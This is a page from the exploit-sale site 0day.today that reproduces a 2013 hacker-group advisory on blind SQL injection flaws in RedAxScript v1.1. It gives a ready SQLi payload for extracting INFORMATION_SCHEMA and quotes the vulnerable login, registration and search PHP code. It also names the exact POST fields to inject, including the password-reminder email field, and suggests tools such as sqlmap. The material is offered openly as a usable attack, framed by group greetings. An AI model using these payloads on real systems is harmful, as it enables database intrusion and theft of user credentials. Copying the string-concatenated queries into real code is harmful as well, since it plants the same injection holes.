0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
RedAxScript v1.1 <= Multiple Blind SQL Injection Vulnerabilities
[1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[>] Title : RedAxScript v1.1 <= Multiple Blind SQL Injection Vulnerabilities
[>] Author : KedAns-Dz
[+] E-mail : ked-h (@hotmail.com / @1337day.com)
[+] FaCeb0ok : fb.me/Inj3ct0rK3d
[+] TwiTter : @kedans
[#] Platform : PHP / WebApp
[+] Cat/Tag : Multiple , SQL Injection , Blind SQLi
[<] <3 <3 Greetings t0 Palestine <3 <3
- Blind SQL Injection ( 'POST' Query and 'GET' the full 'Information_Schema' ):
AND (SELECT 8041 FROM(SELECT COUNT(*),CONCAT(0x3a6f79753a,(SELECT (CASE WHEN (8041=8041) THEN 1 ELSE 0 END)),0x3a70687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- POST Inject via HTTP headers attack's or HTTP debugger, HackBar / or use any toolkit like sqlmap, sql-ninja etc..
#### P.O.C [1] => in (login.php) | lines: ( 69 , 73.. 74) ##
****
$post_user = clean ($_POST['user'], 0);
$users_query = 'SELECT id, name, user, email, password, language, status, groups FROM ' . PREFIX . 'users WHERE user = \'' . $post_user . '\'';
mysql_query $users_result = mysql_query($users_query);
****
[+] POST Data on > : user=[ SQL Injection Here ]
############################################################
#### P.O.C [2] => in (registration.php) | lines: ( 59.. 62 , 142..156)
****
$r['email'] = clean ($_POST['email'], 3);
$r['user'] = clean ($_POST['user'], 0);
$r['name'] = clean ($_POST['name'], 0);
****
mysql_query mysql_query($query);
$query = 'INSERT INTO ' . PREFIX . 'users (' . $key_string . ') VALUES (' . $value_string . ')';
$key_string .= ', '; // if($last != $key),
$key_string .= $key;
foreach($r as $key=>$value)
$value_string .= '\'' . $value . '\'';
****
[+] go to registration and POST Data on > : ( email, user, name ) =>
email=-[ SQL Injection Here ]--&user=-[ SQL Injection Here ]--&name=-[ SQL Injection Here ]--
############################################################
#### P.O.C [3] => in (search.php) | lines: ( 47, 61, 70.. 82) ##
****
$search_terms = clean ($_POST['search_terms'], 1);
****
$query .= ')'; // if($search),
$query .= ' || '; // if($search), if($last != $key),
$query = 'SELECT id, title, alias, description, date, category, access FROM '...
foreach($search as $key=>$value) // if($search),
$search = array_filter(explode(' ', $search_terms));
****
mysql_query $result = mysql_query($query);
$query .= ' ORDER BY date DESC LIMIT 50';
****
[+] in Search area : POST Data on ( search_terms )
search_terms=[ SQL Injection Here ]
#### && Other Bug/Vulnerability in (reminder.php) when u do remind passwd :p
lines : ( 57 , & 80.. 85 )
[+] POST Data on > : ( email=[ SQLi ] )
## note : you can see befor any $_POST there is a function ' clean ' ( included clean.php )
but blind sqli attacks still workin' ,the clean func replace u'r input to alpha-num output just it
####
#<! THE END ^_* ! , Good Luck all <3 | 1337-DAY Aint DIE ^_^ !>
#<+ Proof Of Concept & Exploit Hunted by : Khaled [KedAns-Dz] +>
#<+ Copyright © 2013 Inj3ct0r Team | 1337day Exploit Database +>
# ** Greetings : < Dz Offenders Cr3w [&] Algerian Cyber Army > *
# ** ! Hassi Messaoud <3 1850 Hood <3 , Dedicate fr0m Algeria **
#---------------------------------------------------------------
# Greetings to my Homies : Indoushka , Caddy-Dz , Kalashinkov3 ,
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & r0073r , KeyStr0ke , JF , Sid3^effectS , r4dc0re , CrosS , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )=
####
# 0day.today [2024-11-15] #